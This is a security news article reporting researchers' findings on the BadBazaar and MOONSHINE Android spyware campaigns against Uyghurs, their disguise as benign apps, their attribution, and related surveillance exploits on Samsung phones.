The BadBazaar campaign, according to the security firm, is said to date as far back as late 2018 and comprise 111 unique apps that masquerade as benign video players, messengers, religious apps, and even TikTok.

While these samples were distributed through Uyghur-language social media platforms and communication channels, Lookout noted it found a dictionary app named "Uyghur Lughat" on the Apple App Store that communicates with a server used by its Android counterpart to gather basic iPhone information.

The iOS app continues to be available on the App Store.

"Since BadBazaar variants often acquire their surveillance capabilities by downloading updates from their \[command-and-control server\], it is possible the threat actor is hoping to later update the iOS sample with similar surveillance functionality," the researchers pointed out.

BadBazaar, once installed, comes with several features that allow it to collect call logs, GPS locations, SMS messages, and files of interest; record phone calls; take pictures; and exfiltrate substantial device metadata.

Further analysis of BadBazaar's infrastructure has revealed overlaps with another spyware operation aimed at the ethnic minority that came to light in July 2020 and which made use of an Android toolset called DoubleAgent.

Attacks employing MOONSHINE, in a similar vein, have employed over 50 malicious apps since July 2022 that are engineered to amass personal data from the infected devices, in addition to recording audio and downloading arbitrary files.

"The majority of these samples are trojanized versions of popular social media platforms, like WhatsApp or Telegram, or trojanized versions of Muslim cultural apps, Uyghur-language tools, or prayer apps," the researchers said.

Prior malicious cyber activities leveraging the MOONSHINE Android spyware kit have been attributed to a threat actor tracked as POISON CARP (aka Evil Eye or Earth Empusa), a China-based nation-state collective known for its attacks against Uyghurs.

The findings come a little over a month after Check Point disclosed details of another long-standing surveillanceware operation aimed at the Turkic Muslim community that deployed a trojan named MobileOrder since at least 2015.

"BadBazaar and these new variants of MOONSHINE add to the already extensive collection of unique surveillanceware used in campaigns to surveil and subsequently detain individuals in China," Lookout said.

"The wide distribution of both BadBazaar and MOONSHINE, and the rate at which new functionality has been introduced indicate that development of these families is ongoing and that there is a continued demand for these tools."

The development also follows a report from Google Project Zero last week, which uncovered evidence of an unnamed commercial surveillance vendor weaponizing three zero-day security flaws in Samsung phones with an Exynos chip running kernel version 4.14.113. The security holes were plugged by Samsung in March 2021.

That said, the search giant said the exploitation mirrored a pattern similar to recent compromises where malicious Android apps were abused to target users in Italy and Kazakhstan with an implant referred to as Hermit, which has been linked to Italian company RCS Lab.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple